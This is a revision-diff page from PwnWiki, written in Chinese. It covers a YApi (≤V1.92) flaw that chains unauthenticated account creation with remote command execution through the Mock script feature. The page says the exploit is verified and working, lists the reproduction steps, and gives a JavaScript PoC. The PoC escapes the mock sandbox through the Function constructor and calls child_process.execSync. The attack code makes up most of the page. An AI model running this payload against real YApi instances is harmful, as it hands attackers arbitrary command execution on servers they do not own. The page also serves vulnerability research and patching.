Difference between revisions of "YApi 未授權用戶創建&Mock遠程命令執行漏洞"
From PwnWiki
| Line 54: | Line 54: | ||
const myfun = FunctionConstructor('return process') | const myfun = FunctionConstructor('return process') | ||
const process = myfun() | const process = myfun() | ||
| − | + | mockJson = process.mainModule.require("child_process").execSync("command").toString() | |
</pre> | </pre> | ||
Latest revision as of 23:46, 8 July 2021
|
該漏洞已通過驗證
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。 |
影響版本
<=V1.92 All
漏洞復現
登錄註冊後,創建一個項目
然後選擇設置全局的mock腳本,設置命令為遠程訪問我的服務器地址。
添加接口,訪問接口的mock地址
服務器可以看到如下響應
POC
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("command").toString()
